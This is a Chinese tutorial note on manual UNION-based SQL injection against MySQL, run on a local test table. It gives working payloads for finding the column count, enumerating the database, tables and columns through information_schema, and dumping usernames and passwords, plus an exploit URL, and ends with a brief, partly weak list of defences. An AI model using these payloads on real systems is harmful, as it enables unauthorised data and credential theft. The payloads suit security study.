**concat：** 用于字符串連接； ``` select concat('a','b',1); ```  **concat_ws：** 用于字符串連接，第一個參數是連接字符串的分隔符； ``` select concat_ws(',',1,2,3); ```  **手工注入** 第一步確定列數 比如如下圖user表有4列（id、username、pwd、sex）  ~~~ select * from user where id = 1 order by 1 select * from user where id = 1 order by 2 ... select * from user where id = 1 order by n ~~~ 超出4則會報錯或者不返回信息，這個根據不同網站處理方法不一樣 查出4列 ``` select * from user where id = 1 union select 1,2,3,4; ``` 小修改下就查出數據庫的用戶名而不是use表的 ``` select * from user where id = 1 union select 1,user(),3,4; ```  >[danger]注意：上面確定多少列后后面必須跟多少列否則會報`The used SELECT statements have a different number of columns`所以`union select 1,2,3;`和`union select 1,2,3,4，5;`都是不行的 使用**database()**?函數輸出數據庫名稱 ``` select * from user where id = 1 union select 1,database(),3,4; ```  使用**負數**只輸出union的select值： ``` select * from user where id = -1 union select 1,database(),3,4; ```  綜合上述信息 ``` select * from user where id = -1 union select user(),database(),3,4; ```  更具上面的信息找出對應的表 ``` select * from user where id = -1 union select 1,table_name,3,4 from information_schema.tables where table_schema = 'test'; ```  >[danger] 注意union時 user表與information_schema.tables的表和字段的字符集和排序規則要一樣，我的mysql的information_schema數據庫及其表和字段配需規則都是utf8_general_ci而user的卻是utf8_unicode_ci所以就報了`1271 - Illegal mix of collations for operation 'UNION'`的錯誤 > 根據表查詢表有哪些字段 ``` select * from user where id = -1 union select 1,column_name,3,4 from information_schema.columns where table_schema = 'test' and table_name='user'; ```  最后查出有用的信息 ``` select * from user where id = -1 union select 1,concat_ws(char(32,58,32),id,username,pwd,sex),3,4 from user; ```  http://localhost/test.php?id=1 and 1=1; 利用：`http://localhost/test.php?id=-1%20union%20select%201,user%28%29,3%20from%20book` 防御 轉義 ①：開啟 gpc （php5.4的更高版本中，這個選項被去掉了，避免用戶依賴自動轉義，高版本需要用戶自己轉義） ②：mysql_real_escape_string ③：addslashes ④：關鍵字過濾